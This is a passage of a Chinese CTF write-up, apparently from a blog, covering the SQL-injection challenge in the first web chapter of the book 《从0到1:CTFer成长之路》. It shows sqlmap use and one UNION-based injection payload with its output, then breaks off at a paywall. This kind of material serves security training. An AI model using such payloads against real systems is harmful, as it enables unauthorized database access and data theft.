本文介绍了《从0到1:CTFer成长之路》书籍配套题目中的第一章web入门部分,涉及SQL注入。通过sqlmap工具逐步揭示数据库信息,包括数据库名、表名、列名,最终成功获取到flag。强调了理解sqlmap工具及其工作原理的重要性,并提供了相关教程链接。
《从0到1:CTFer成长之路》书籍配套题目,来源网站:《从0到1:CTFer成长之路》
[第一章 web入门]SQL注入-1
1.首页
使用sqlmap破解
sqlmap扫描结果。
有结果可知Payload:
id=-8462' UNION ALL SELECT NULL,NULL,CONCAT(0x7162627a71,0x57696b44676d524a54594c47686e45526e48524c746a49566d6f5941487355764262516c7569765a,0x717a787071)-- -
用上得到结果。
qbbzqWikDgmRJTYLGhnERnHRLtjIVmoYAHsUvBbQluivZqzxpq
但这还不是flag,那就继续呗。
但这几个payload都不是,所以这条路走不通。
所以一步一步来。
1.sqlmap爆当前数据库信息
python sqlmap
最低0.47元/天 解锁文章
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
